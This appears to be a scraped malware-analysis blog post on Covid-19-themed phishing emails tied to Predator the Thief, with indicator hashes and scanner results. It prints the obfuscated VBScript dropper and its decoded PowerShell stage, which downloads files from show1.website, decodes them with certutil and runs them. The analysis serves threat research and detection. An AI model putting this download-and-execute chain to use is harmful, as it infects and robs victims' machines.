Meta
\n=====<\/p>\n
From: *.xyz
\nSubject: Various Covid-19
\nAttachment: covidXX_form.zip<\/p>\n
This looks to be related to Predator the Thief malspam based on the final script that gets executed which looks very close to the sample that I posted about over here<\/a>. The zip file and VBScript can be found in my Github repo here<\/a>.<\/p>\n Here is the code in the actual VBScript.<\/p>\n And then with it decoded (first pass).<\/p>\n Which leads to this final code being runned on the system.<\/p>\n Reference – http:\/\/urlhaus.abuse.ch\/browse.php?search=show1.website<\/a> Artifacts Email hashes File hashes 5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5 —— covid21_form.zip d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid21_form.vbs Machinae results File names: covid21_form.zip, covid21_form.vbs [+] VirusTotal File Report Results [+] VirusTotal File Report Results Munin results 1 \/ 2 > Suspicious 2 \/ 2 > Suspicious Meta ===== From: *.xyz Subject: Various Covid-19 Attachment: covidXX_form.zip This looks to be related to Predator the Thief malspam based on the final script that gets executed which looks very close to the sample that I posted about over here. The zip file and VBScript can be found in my Github repo here. Here is the code in the actual VBScript. Function l(a): With CreateObject("Msx"+"ml2.DOMD"+"ocument").CreateElement("aux"): .DataType = "bin.base64": .Text = a: l = r(.NodeTypedValue): End With: End Function Function r(b): With CreateObject("ADODB"+".Stream"): .Type = 1: .Open: .Write b: .Position = 0: .Type = 2: .CharSet = "utf-8": r = .ReadText:…<\/p>\n\r\nFunction l(a): \r\nWith CreateObject("Msx"+"ml2.DOMD"+"ocument").CreateElement("aux"): .DataType = "bin.base64": .Text = a: l = r(.NodeTypedValue): \r\nEnd With: \r\nEnd Function \r\nFunction r(b): \r\nWith CreateObject("ADODB"+".Stream"): .Type = 1: .Open: .Write b: .Position = 0: .Type = 2: .CharSet = "utf-8": r = .ReadText: .Close: \r\nEnd With: \r\nEnd function \r\nExecute(l("U2V0IHRlYXMgPSBHZXRPYmplY3QoIndpbm1nbXRzOlxcLlxyb290XGNpbXYyOldpbjMyX1Byb2Nlc3NTdGFydHVwIikKdGVhcy5TaG93V2luZG93ID0gMApIZWFzSmllYSA9IEdldE9iamVjdCgid2lubWdtdHM6XFwuXHJvb3RcY2ltdjI6V2luMzJfUHJvY2VzcyIpLkNyZWF0ZShTdHJSZXZlcnNlKCI9PUFBM0F3YUFVR0E0QVFhQUFDQTBCd2NBa0dBTUJBZEE0R0FsQlFiQVVIQW5CZ2NBRUVBdEFBSUFrR0F0QndOQUVEQXlCQUlBTUhBekJRWkFNR0F2QmdjQUFGQXRBQWRBSUhBaEJBZEFNRkFnQUFJQXNEQTNBd2FBVUdBNEFRYUFBQ0EwQmdlQVVHQXJCZ2FBQUNBbEJBWkE4R0FqQlFaQVFHQXRBQUlBd0dBcEJBZEFVSEEwQmdjQVVHQWpCQUlBc0RBaUFBVUEwRUFGQkFWQW9EQTJCZ2JBVUdBa0FnSUFBQ0FvQkFkQUVHQVFCUUxBQUNBdUJ3YkFrR0EwQlFZQU1HQXZCQVRBMENBMEJRWkFNRkFnQXdPQUlDQXRCd2JBTUdBdUFRZUE4RUFaQkFVQWtHQWNCQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBd0NBaUFBZEFvSEFsQndhQW9HQWNCQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBd0NBaUFRYkE4R0FqQmdMQWtHQXRCd05BRURBeUJBWEFBRkFOQlFSQVFGQTZBZ2RBNEdBbEJBSkFJQ0FnQWdiQThHQXBCQWRBRUdBdUJRYUFRSEF6QlFaQVFFQXRBQUlBUUhBaEJBWkE0Q0E1QndUQWtGQVFCUWFBOENBbEJBZEFrR0F6QmdZQVVHQTNCZ0xBRURBM0J3YkFnR0F6QndMQThDQTZBQWNBUUhBMEJBYUF3Q0EwQlFZQVFHQXVBQVRBRUdBNUJRWkFnRUF2QVFaQVFIQXBCd2NBSUdBbEJ3ZEE0Q0F4QXdkQThHQW9Cd2NBOENBdkFnT0FBSEEwQkFkQWdHQXNBQWRBRUdBa0JnTEFNRkFCQmdjQVVHQVBCd0xBVUdBMEJRYUFNSEFpQlFaQWNIQXVBUU1BY0hBdkJBYUFNSEF2QXdMQW9EQXdCQWRBUUhBb0JBSUFVR0FqQmdjQVVIQXZCd1VBMENBZ0FnY0FVR0FtQndjQTRHQWhCZ2NBUUZBekJBZEFrR0FDQlFMQVFIQXlCUVlBUUhBVEJBSUFzREF5QlFaQVlHQXpCZ2JBRUdBeUJBVkFNSEEwQlFhQUlFQWdBUVpBd0dBMUJBWkE4R0FOQlFMQVFIQXlCd2JBQUhBdEJRUyBlLSBsbGVoc3Jld29wIikgLCBOdWxsLCB0ZWFzLCBHZWF1ZCAp"))\r\n<\/pre>\n\r\nSet teas = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_ProcessStartup")\r\nteas.ShowWindow = 0\r\nHeasJiea = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_Process").Create(StrReverse("==AA3AwaAUGA4AQaAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIAkGAtBwNAEDAyBAIAMHAzBQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDA3AwaAUGA4AQaAACA0BgeAUGArBgaAACAlBAZA8GAjBQZAQGAtAAIAwGApBAdAUHA0BgcAUGAjBAIAsDAiAAUA0EAFBAVAoDA2BgbAUGAkAgIAACAoBAdAEGAQBQLAACAuBwbAkGA0BQYAMGAvBATA0CA0BQZAMFAgAwOAICAtBwbAMGAuAQeA8EAZBAUAkGAcBAUA0EAFBAVAoDA2BgbAUGAkAgIAwCAiAAdAoHAlBwaAoGAcBAUA0EAFBAVAoDA2BgbAUGAkAgIAwCAiAQbA8GAjBgLAkGAtBwNAEDAyBAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBAdAEGAuBQaAQHAzBQZAQEAtAAIAQHAhBAZA4CA5BwTAkFAQBQaA8CAlBAdAkGAzBgYAUGA3BgLAEDA3BwbAgGAzBwLA8CA6AAcAQHA0BAaAwCA0BQYAQGAuAATAEGA5BQZAgEAvAQZAQHApBwcAIGAlBwdA4CAxAwdA8GAoBwcA8CAvAgOAAHA0BAdAgGAsAAdAEGAkBgLAMFABBgcAUGAPBwLAUGA0BQaAMHAiBQZAcHAuAQMAcHAvBAaAMHAvAwLAoDAwBAdAQHAoBAIAUGAjBgcAUHAvBwUA0CAgAgcAUGAmBwcA4GAhBgcAQFAzBAdAkGACBQLAQHAyBQYAQHATBAIAsDAyBQZAYGAzBgbAEGAyBAVAMHA0BQaAIEAgAQZAwGA1BAZA8GANBQLAQHAyBwbAAHAtBQS e- llehsrewop") , Null, teas, Geaud )\r\n<\/pre>\n\r\nImport-Module BitsTransfer;\r\nStart-BitsTransfer -Source http:\/\/show1.website\/OerAS.dat,http:\/\/show1.website\/HeyaL.dat,http:\/\/show1.website\/iPYOy.dat -Destination "$env:TEMP\\r17mi.com","$env:TEMP\\jkezt","$env:TEMP\\iPYOy.com";\r\nSet-Location -Path "$env:TEMP";\r\ncertutil -decode jkezt i8ek7;\r\nStart-Process r17mi -ArgumentList i8ek7\r\n<\/pre>\n
\n==========<\/p>\n
\n– http:\/\/malshare.com\/search.php?query=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c<\/a>
\n– http:\/\/bazaar.abuse.ch\/browse.php?search=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c<\/a>
\n– http:\/\/app.any.run\/tasks\/8f771d9c-355f-4262-bac0-0a1927f52222\/<\/a>
\n– http:\/\/gchq.github.io\/CyberChef\/#recipe=Reverse(‘Character’)From_Base64(‘A-Za-z0-9%2B\/%3D’,true)Remove_null_bytes()&input=PT1BQTNBd2FBVUdBNEFRYUFBQ0EwQndjQWtHQU1CQWRBNEdBbEJRYkFVSEFuQmdjQUVFQXRBQUlBa0dBdEJ3TkFFREF5QkFJQU1IQXpCUVpBTUdBdkJnY0FBRkF0QUFkQUlIQWhCQWRBTUZBZ0FBSUFzREEzQXdhQVVHQTRBUWFBQUNBMEJnZUFVR0FyQmdhQUFDQWxCQVpBOEdBakJRWkFRR0F0QUFJQXdHQXBCQWRBVUhBMEJnY0FVR0FqQkFJQXNEQWlBQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBQUNBb0JBZEFFR0FRQlFMQUFDQXVCd2JBa0dBMEJRWUFNR0F2QkFUQTBDQTBCUVpBTUZBZ0F3T0FJQ0F0QndiQU1HQXVBUWVBOEVBWkJBVUFrR0FjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBQWRBb0hBbEJ3YUFvR0FjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBUWJBOEdBakJnTEFrR0F0QndOQUVEQXlCQVhBQUZBTkJRUkFRRkE2QWdkQTRHQWxCQUpBSUNBZ0FnYkE4R0FwQkFkQUVHQXVCUWFBUUhBekJRWkFRRUF0QUFJQVFIQWhCQVpBNENBNUJ3VEFrRkFRQlFhQThDQWxCQWRBa0dBekJnWUFVR0EzQmdMQUVEQTNCd2JBZ0dBekJ3TEE4Q0E2QUFjQVFIQTBCQWFBd0NBMEJRWUFRR0F1QUFUQUVHQTVCUVpBZ0VBdkFRWkFRSEFwQndjQUlHQWxCd2RBNENBeEF3ZEE4R0FvQndjQThDQXZBZ09BQUhBMEJBZEFnR0FzQUFkQUVHQWtCZ0xBTUZBQkJnY0FVR0FQQndMQVVHQTBCUWFBTUhBaUJRWkFjSEF1QVFNQWNIQXZCQWFBTUhBdkF3TEFvREF3QkFkQVFIQW9CQUlBVUdBakJnY0FVSEF2QndVQTBDQWdBZ2NBVUdBbUJ3Y0E0R0FoQmdjQVFGQXpCQWRBa0dBQ0JRTEFRSEF5QlFZQVFIQVRCQUlBc0RBeUJRWkFZR0F6QmdiQUVHQXlCQVZBTUhBMEJRYUFJRUFnQVFaQXdHQTFCQVpBOEdBTkJRTEFRSEF5QndiQUFIQXRCUVM<\/a><\/p>\n
\n==========<\/p>\n
\n————-
\n182a2cc132f77bacda747c8b36ae82d807e5a3cee01c734deb29f2598b992918 —— ahpwzh909165720504.eml
\nb23c073099a90b2d42c12c05ed86b09fc8ca563b044a411db55a066ce717cb69 —— amenfj107683720503.eml
\n8758c35198dd93fcdd5558e4b02cf42b00d7db7a89b29696ff43e9b5a652b452 —— aqjhih486051720509.eml
\n727872132b70153b261a32a32549ab3015b2074a880d6c80910d61750f11b009 —— bectoa324586720508.eml
\n2982d7c460629631ae2145580140d26402efc27baa75efb07e63aed50a11607a —— bgnlhx068677720507.eml
\nfa9961b389fbc4bab3554d5ba3e5f3b876504e691209d6391d5c8d52f698089f —— bwshti965590720502.eml
\n87da0ff125413aa5dac4b237e8442c871e4e9020a846f09a6d2739fe3b35042c —— cilevz072352720503.eml
\n1bff3d0e786f66cd47a4480e25a683ca7eec18138c0d2254d8f9c88138e156b3 —— ckvpia223121720509.eml
\n312630c0affd465e3ce6b54da78685dd637494eca9240f9693c2c17a764ce5db —— cqihll893721720502.eml
\n9a732aaacbce30c3a65048c34a11b1e2869a8d7515949145cfbb4360ebd0e4e2 —— dljwob279691720509.eml
\na924cc0373bc5f5ed01c02cb8929c2747755fe63b5a86913bcdf7e477630a74e —— dvfqtv681383720509.eml
\ncbc9322e6da2a67a70a1c27ad321e1cbc42df5af811350f647eba164b50244de —— dwabmh152144720507.eml
\n9408662823842ed16a1e6f6c622382784d436c61907c284458a3a5c88d02da31 —— emoivy091449720505.eml
\nac9962a6b532edb050d319197087ae491d969eb570e5b26d19ba06938be7d11d —— faphdx143744720503.eml
\nf80611ed48c8f7236ce774d93f932a44f7d483daa545e72463ecf541a31f9dd6 —— gqucfs999396720505.eml
\nfde4a39ec21c2511cb79fc58049bfeb4f3404a9bf96bcb0afa7de758ee38af3a —— gsckqv038756720508.eml
\n9b164b3ef7fa34d525b30da95f1ea8cd13aa350383619f3f7c261abebdccc5ad —— helhmv035088720506.eml
\n4168564de21589597ff90de1ed9ac8f9b071515b35873c59b618b3ab2ddcbcc8 —— ifarbb447866720509.eml
\n5a2a46ef8ca3c0e6920caa0e8dce50e9f479cd821ed0b1cc52c0e31fbc4db4b4 —— ivdinf970396720504.eml
\nfc872d847b1ee53d9974ba86114f3cd5c2ace0304d5824da2d936dfadc52f0d3 —— kginyn613097720509.eml
\nbe07c28cb8489517031b6608cf1e6ae96f730fe3fca53f372a60a0cf609f61a1 —— khskmd054398720505.eml
\n2f8f21ca9d9a91f5bb0d8d520a18d15238c30c23dcf19da0870c66018ab9b089 —— lewyfh359586720509.eml
\n59a3448589fd10566cd3ff7b99206b0ae3bc5508636d971f28bca5f89de24203 —— llnbng258644720508.eml
\n93047698e9f054913f24c7ff17a2a46eb2a420d1e4b2df66f8128a1c9b624119 —— lonbxj929511720502.eml
\nb077fdd83c940f1ee0d90c290cc45ba669f6ce5444d11bbaf5838487e4a8c6f3 —— lzfzyu646540720509.eml
\n18b2757cb8bc85d67612426561e0e421bb9cac6dc3537cc186c9c005d68e1a00 —— miwgbo082364720506.eml
\nf3ff0b220ecee663b4f04ab3d763c4d2c7f03ae2c7d17dd19ce19ce17740b5ca —— mqefkj109159720507.eml
\n1a14439b54ab74d5de7a7dc336d27fc820c660934a4d2a634d155d54d2262eab —— nghtpw022081720507.eml
\n3d27775288fae409d1a6c3d63712c6990d51c2eb9368c8e36394fbc0e43f8f56 —— nnlmhy001515720503.eml
\n5fb4a5cb963984a3fbc7e8f084189e1da9ead15097b0d0d436a026c035452584 —— nnynjh213509720506.eml
\n3af0739f1e2707d2fb763de2cb81c66a666fb230ec654c94fe57d15438cde0c4 —— onctnr950551720507.eml
\n98a967858c2c96dd78df404220e6501ab7203ccbdba1da8c0c57c7ac982f2cdc —— ooxcnt317569720509.eml
\nae4a016ce43b45fffc6c56abf5ae7711ecec60d025862ac75c1f02e0ed7393e2 —— oskvef181932720503.eml
\n313a15dc929ca1f01339e1cfd7d08454d138ee124862755a63abcf207b20bb43 —— qlryhj128390720505.eml
\n342d7aa503394d38922eec3099266e92b3b15f02d1099d4e7c7b23728e30b4b1 —— raliuz217617720503.eml
\n239322bfe9df50e2bb4c82e02be8937ecae1f4f2ba7376d167340ecca3a53af3 —— rffkmr935458720505.eml
\nb0d15c2a44d749efce5022bcb437bc3bb9efc79ac2bab099c75a8b9b2125b07a —— rghcly404847720509.eml
\n8e2d0a24adb8e8b3077bf75aed01b897cc0b317d50aaf927772fb22c18b1ebea —— txbsnn206432720508.eml
\nee079262af4424f01b5624815301e16bcf1083ec88874a06a45a945e86b408b3 —— uudqvw036913720503.eml
\n1ab01426f338f727814d3fb20a8dcfbde40da580a5b060fc8e840288573159c4 —— vdhaur167510720505.eml
\n5a474c4ae2715a300c6a4f88a5be448d9ce16931d2cd52f8ba47fd66155fd2f1 —— wmfgiu574933720509.eml
\n19abaf70f1f6cbb424b9e100616097f96d40a6462eeec0358e9518f5c4a9a1ef —— wumwvg372999720508.eml
\nbaa6d1cb5fdd13cfbccf3a533a5f5c9f4148d9a3e65cc6248109f78b4403b226 —— xuxuqj527923720509.eml
\neadee2ef4f229e1a201d1852f1ed034642dff680715c314d4583005b90c61f0b —— ymgomi173864720506.eml
\n7f34f1ae28926fd7165defd06efad7e3b3d9c47807858750afe46efaafc7dfeb —— ynjkty089546720508.eml
\na249e898c675690e11d71b90292cbec89fe6fa1d75257ad4b8e6dd60fd021d24 —— zdjppk015535720505.eml
\n0e734d7344ca7be03122a0e6f826dcfc77fd8cf2ddd673b2fd4b3c7c3a325a1c —— zntqsb424056720508.eml<\/p>\n
\n————<\/p>\n
\nf8620dd6b8fc37fba432728341961a4441ed929ff16cb3f70b80244d70768d7f —— covid22_form.zip
\n0dae5e8e259576a05d87faec63e382f21dc2f2888c82a05b763aa10585bbdda1 —— covid23_form.zip
\n394f653cc7ef4e3d1cc0217bc940b1efabcba7d22662c0d298536f8402a54b58 —— covid24_form.zip
\n14dcc393d3fee5971220634f291bba5776614b9c39c6c6e8da782e79766f8855 —— covid26_form.zip
\n754b8ece7f7f28b1170ca143e45c133f5977add875a2310c1da62b7c884ebbb2 —— covid27_form.zip
\n125575ead5f5ed3c524c7012b89da3741cc0b365e6214ae501a2d056ea1b8d9b —— covid28_form.zip
\n3f0ce0501a74811d8ef6f314d4bfdf34d8204ecc90b296ca19c4a5a20ab8f5d0 —— covid30_form.zip
\n436672d96a9c9f1216de032cbf34d0a1b1eb86e3f1e903631d6df3994a460566 —— covid31_form.zip
\nd9db96ab59eaab31009d5facc359e3bc6e915cd6558e339cd94b6c407b3934be —— covid32_form.zip
\n1ebfff4292722a5e785adfb5f86f8c99302f915e6a40dd166de3162ad252bc58 —— covid34_form.zip
\nccc9b3ce71b082c0e81dc8acb8ddbb8d4aa66dfebf3377ca3f2d5d0e47007b3b —— covid35_form.zip
\n273ec7da73a29a99e0e28142e3d9fe80e297a06fe18e32a6537913453bfd1652 —— covid38_form.zip
\nf9201a2787ec144b0638e22744a074ef168084f94123d1cd8f25f42ef10b7a57 —— covid39_form.zip
\nbc27f858d9ad61c36b95a232e506476de8ebdd85eb712bcbf6b045fbb1c340eb —— covid41_form.zip
\ne9fb57f7f5286e07ef704bac0ddeb098542ee3229a03220a0b7677daf177bf7e —— covid42_form.zip
\n8fac412bdd6401a0f1d178a023e3c2d128d35cfec500ef194b2f4872b561a6b7 —— covid43_form.zip
\na2a062cdfad00e93b8fd83887d1b12f446312aa3f990bc43e3addc8254983f34 —— covid44_form.zip
\ndfdbe5ff6d5ea17ff3ed0b521a0ea6c4b2c95e4702ba4725ff006d507cfc3504 —— covid45_form.zip
\ne5187acd91e48b18e68ef63093d0368c3a6f24527160d42089071edf5e69139d —— covid46_form.zip
\n03a8a1e0c5e0ecf7c51ca10ffe1bf1428606df7b8c3e4ab6df313f074ef992e9 —— covid47_form.zip
\n5400e9d4de9cefac60ac1b05608e53ee14a1579f1835762cf56f01c9e925abbc —— covid49_form.zip
\na29afb545040a7c5f67bad6e03614a5e346c99fd2d851285fc5c2e2f80c380ff —— covid50_form.zip
\nb374c87ae852aa0443eb541f7d4ef4017c4238b10155381b88bb05016caab445 —— covid51_form.zip
\n15f3dae3f977165267156bbd90fcb9e1dd8dc92ae5247b5621b3ce0439b89d1e —— covid53_form.zip<\/p>\n
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid22_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid23_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid24_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid26_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid27_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid28_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid30_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid31_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid32_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid34_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid35_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid38_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid39_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid41_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid42_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid43_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid44_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid45_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid46_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid47_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid49_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid50_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid51_form.vbs
\nd231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid53_form.vbs<\/p>\n
\n—————–<\/p>\n
\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/file\/report?apikey=XXX&resource=5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5 (GET)
\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/file\/report?apikey=XXX&resource=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c (GET)
\n********************************************************************************
\n* Information for 5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
\n [-] Date submitted: 2020-03-20 17:30:07
\n [-] Detected engines: 2
\n [-] Total engines: 63
\n [-] Scans: (‘Arcabit’, ‘HEUR[.]Arch[.]Script.A’)
\n [-] Scans: (‘Qihoo-360’, ‘virus[.]vbs[.]qexvmc.1085’)
\n********************************************************************************
\n* Information for d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
\n [-] Date submitted: 2020-03-20 17:22:46
\n [-] Detected engines: 3
\n [-] Total engines: 59
\n [-] Scans: (‘Microsoft’, ‘TrojanDownloader:VBS\/Nemucod!MTB’)
\n [-] Scans: (‘ZoneAlarm’, ‘UDS:DangerousObject[.]Multi[.]Generic’)
\n [-] Scans: (‘Qihoo-360’, ‘virus[.]vbs[.]qexvmc.1085’)<\/p>\n
\n————–<\/p>\n
\nHASH: d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c COMMENT: covid21_form.vbs
\nVIRUS: Microsoft: TrojanDownloader:VBS\/Nemucod!MTB
\nTYPE: Text SIZE: 1.77 KB FILENAMES: covid22_form.vbs, covid22_form.vbs
\nFIRST: 2020-03-20 14:23:16 LAST: 2020-03-20 17:30:04 SUBMISSIONS: 1 REPUTATION: 0
\nCOMMENTS: 0 USERS: – TAGS: TEXT
\nRESULT: 3 \/ 58
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c<\/a><\/p>\n
\nHASH: 5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5 COMMENT: covid21_form.zip
\nTYPE: ZIP SIZE: 1.22 KB FILENAMES: covid21_form.zip, covid21_form.zip
\nFIRST: 2020-03-20 14:11:51 LAST: 2020-03-20 17:30:07 SUBMISSIONS: 1 REPUTATION: 0
\nCOMMENTS: 0 USERS: – TAGS: ZIP
\nRESULT: 2 \/ 63<\/p>\n","protected":false},"excerpt":{"rendered":"